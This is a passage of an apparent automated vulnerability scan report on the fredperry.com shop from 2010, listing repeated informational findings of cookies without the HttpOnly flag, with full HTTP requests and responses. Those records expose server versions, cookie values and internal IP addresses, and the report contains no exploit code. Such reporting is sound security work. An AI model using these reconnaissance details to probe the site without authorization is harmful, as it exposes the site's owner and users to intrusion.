Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/shirts/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /men/shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:55:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=c9adu0d89fm1e05tplls9nk9f1; expires=Tue, 09-Nov-2010 16:55:21 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's S
...[SNIP]...

6.67. http://www.fredperry.com/men/t-shirts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/t-shirts/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /men/t-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:56:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=qnu48lti5b337ljlku80fsmma5; expires=Tue, 09-Nov-2010 16:56:09 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> T-Shirt
...[SNIP]...

6.68. http://www.fredperry.com/men/tennis/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/tennis/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /men/tennis/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:56:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=jljqa65r9i94hqgv7m8uiud123; expires=Tue, 09-Nov-2010 16:56:48 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Tennis
...[SNIP]...

6.69. http://www.fredperry.com/men/track-jackets/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/track-jackets/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /men/track-jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:56:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=d04a9roe8um3kknnc3akg99sj2; expires=Tue, 09-Nov-2010 16:56:11 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Track J
...[SNIP]...

6.70. http://www.fredperry.com/men/trousers/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/trousers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /men/trousers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:55:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=cusiib36tf2dhc231ie1lrh9r4; expires=Tue, 09-Nov-2010 16:55:55 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's T
...[SNIP]...

6.71. http://www.fredperry.com/men/woven-shirts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/woven-shirts/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /men/woven-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:55:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ocnd6drusa2gri65vosiku60t3; expires=Tue, 09-Nov-2010 16:55:59 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Woven S
...[SNIP]...

6.72. http://www.fredperry.com/productinfo/clothingsizes/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/clothingsizes/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /productinfo/clothingsizes/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=afhqfus9lkc6pfi8rm0mup6d03; expires=Tue, 09-Nov-2010 17:16:31 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Clothin
...[SNIP]...

6.73. http://www.fredperry.com/productinfo/footwearsizes/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/footwearsizes/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /productinfo/footwearsizes/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=t4dodkhnun20jsb1eo0jnddpe7; expires=Tue, 09-Nov-2010 17:16:20 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32849

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Footwea
...[SNIP]...

6.74. http://www.fredperry.com/productinfo/garmentcare/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/garmentcare/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /productinfo/garmentcare/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=03fb99c0binrvc448ru3lb2gu6; expires=Tue, 09-Nov-2010 17:16:16 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31272

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Garment
...[SNIP]...

6.75. http://www.fredperry.com/sale/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /sale/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sale/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3u5jp752ti8svrvck3n1vv3703; expires=Tue, 09-Nov-2010 17:19:07 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Sale -
...[SNIP]...

6.76. http://www.fredperry.com/shops/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /shops/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

frontend

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shops/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:13:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=qlde3d5egr5vu9mvfgqi54aji5; expires=Tue, 09-Nov-2010 17:13:30 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 68571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Our Sho
...[SNIP]...

6.77. http://www.fredperry.com/site-map/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /site-map/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

frontend

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site-map/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:17:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=dedf6ep6bp89g32002juma1012; expires=Tue, 09-Nov-2010 17:17:47 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Site Ma
...[SNIP]...

6.78. http://www.fredperry.com/skin/frontend/default/default/css/catalogue.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/catalogue.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /skin/frontend/default/default/css/catalogue.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
Date: Tue, 09 Nov 2010 15:45:15 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 01 Nov 2010 15:48:48 GMT
ETag: "1ff0d1d-b42-493ffbe731800"
Accept-Ranges: bytes
Content-Length: 2882
Content-Type: text/css

/* Techy Jims Catalogue styling */


/* Main product listing grid */

.products-grid td
{
   width:25%;
}

.category-products,.category-title
{
   margin-left: 20px;
   margin-right: 20px;
}


.products-g
...[SNIP]...

6.79. http://www.fredperry.com/skin/frontend/default/default/css/clears.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/clears.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /skin/frontend/default/default/css/clears.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
Date: Tue, 09 Nov 2010 15:45:15 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 09 Mar 2009 10:57:31 GMT
ETag: "1ff0c6f-7ba-464ad80457cc0"
Accept-Ranges: bytes
Content-Length: 1978
Content-Type: text/css

/**
* Magento
*
* NOTICE OF LICENSE
*
* This source file is subject to the Academic Free License (AFL 3.0)
* that is bundled with this package in the file LICENSE_AFL.txt.
* It is also availabl
...[SNIP]...

6.80. http://www.fredperry.com/skin/frontend/default/default/css/fp_style.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/fp_style.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /skin/frontend/default/default/css/fp_style.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
Date: Tue, 09 Nov 2010 15:45:18 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 01 Oct 2010 14:35:29 GMT
ETag: "1ff0ec9-413a-4918f1b2b0e40"
Accept-Ranges: bytes
Content-Length: 16698
Content-Type: text/css

/* Global Settings */
body
{
   font-size: 11px;
   background: #dcdcdc;
   /*    border: 1px #000 solid;*/
}

a
{
   text-decoration:none;
   color:#333;
   outline:none;
}

a:hover
{
   text-decoration:underline;
}

...[SNIP]...

6.81. http://www.fredperry.com/skin/frontend/default/default/css/generalpages.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/generalpages.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /skin/frontend/default/default/css/generalpages.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
Date: Tue, 09 Nov 2010 15:45:15 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 08 Nov 2010 16:28:35 GMT
ETag: "1ff04c8-77c3-4948d1d9d72c0"
Accept-Ranges: bytes
Content-Length: 30659
Content-Type: text/css

/*
.page .main
{
   margin-top:10px;
}
*/

/*
.messages
{
   margin-bottom:20px;
}
*/

.greystrip {
background:#DCDCDC;
clear:both;
height:10px;
margin:0;
padding:0 20px 0 0;
}

#customercare h2
{
   backg
...[SNIP]...

6.82. http://www.fredperry.com/skin/frontend/default/default/css/gs_960.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/gs_960.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /skin/frontend/default/default/css/gs_960.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.194CKOLO; path=/
Date: Tue, 09 Nov 2010 15:45:06 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 09 Mar 2009 10:57:31 GMT
ETag: "d10bce-e91-464ad80457cc0"
Accept-Ranges: bytes
Content-Length: 3729
Content-Type: text/css

.container_12,.container_16{margin-left:auto;margin-right:auto;width:960px}.grid_1,.grid_2,.grid_3,.grid_4,.grid_5,.grid_6,.grid_7,.grid_8,.grid_9,.grid_10,.grid_11,.grid_12,.grid_13,.grid_14,.grid_15
...[SNIP]...

6.83. http://www.fredperry.com/skin/frontend/default/default/css/gs_reset.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/gs_reset.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /skin/frontend/default/default/css/gs_reset.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.194CKOLO; path=/
Date: Tue, 09 Nov 2010 15:45:06 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 09 Mar 2009 10:57:31 GMT
ETag: "d10bcf-288-464ad80457cc0"
Accept-Ranges: bytes
Content-Length: 648
Content-Type: text/css

html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,acronym,address,big,cite,code,del,dfn,em,font,img,ins,kbd,q,s,samp,small,strike,strong,sub,sup,tt,var,b,u,i,center,dl,
...[SNIP]...

6.84. http://www.fredperry.com/skin/frontend/default/default/css/gs_text.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/gs_text.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /skin/frontend/default/default/css/gs_text.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.194CKOLO; path=/
Date: Tue, 09 Nov 2010 15:45:06 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 09 Mar 2009 10:57:31 GMT
ETag: "d10bd0-1b5-464ad80457cc0"
Accept-Ranges: bytes
Content-Length: 437
Content-Type: text/css

